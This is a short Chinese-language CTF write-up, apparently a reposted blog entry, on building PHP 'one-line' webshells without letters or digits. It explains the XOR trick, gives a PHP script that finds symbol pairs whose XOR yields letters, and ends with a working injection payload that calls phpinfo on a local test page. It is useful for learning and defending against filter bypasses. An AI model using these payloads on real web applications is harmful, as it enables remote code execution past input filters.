无字母数字webshell
无字母数字webshell
用户2700375
发布于 2022-06-09 14:31:21
发布于 2022-06-09 14:31:21
代码可运行
运行总次数:0
代码可运行
最近ctf经常遇到类似姿势的题目,最开始还是比较蒙的 今天来进行一个总结
文章参考p牛的博客
无字母数字 如何构造一句话木马。
这里用到三种方法
异或构造
这种方法用到特殊符号的异或最终得到数字或者字母
如上图
echo "~"^"$"
echo "^"^"<"即可构造出字母 转换过程为
将两个要比较的字符转换成ascii之后。进行异或运算后得到了字母
~的ascii值为126 126的二进制为1111110
$的ascii值为36 36的二进制为 0100100
两个二进制的值进行异或运算得到 1011010转换成ascii为90 也就是对应大写字母Z
那么我们如果构造处一句话 不可能一个一个去试对吧 这里贴上一个 异或得到字母的PHP脚本
<?php
$test = '~!@#$%^&*()_+\|/?.,-={}[]';
for($i=0;$i<strlen($test);$i++){
for($j=0;$j<strlen($test);$j++){
if(ord($test[$i]^$test[$j])>64 && ord($test[$i]^$test[$j])<91){
echo $test[$i].'^'.$test[$j].'结果为:';
echo $test[$i]^$test[$j];
echo '<br>';
}else if(ord($test[$i]^$test[$j])>97 && ord($test[$i]^$test[$j])<122){
echo $test[$i].'^'.$test[$j].'结果为:';
echo $test[$i]^$test[$j];
echo '<br>';
}
}
}
?>CTF
一道简单的题目 首先我们构造异或后为phpinfo的 payload
-^] p
(^@ h
-^] p
)^@ i
.^@ n
=^{ f
@^/ o
传入的知识phpinfo字符串 最终还需传入括号
最终payload为
http://127.0.0.1/webshell/ctf.php?code=$_='-(-).=@'^']@]@@[/';$_();本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-12-24,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
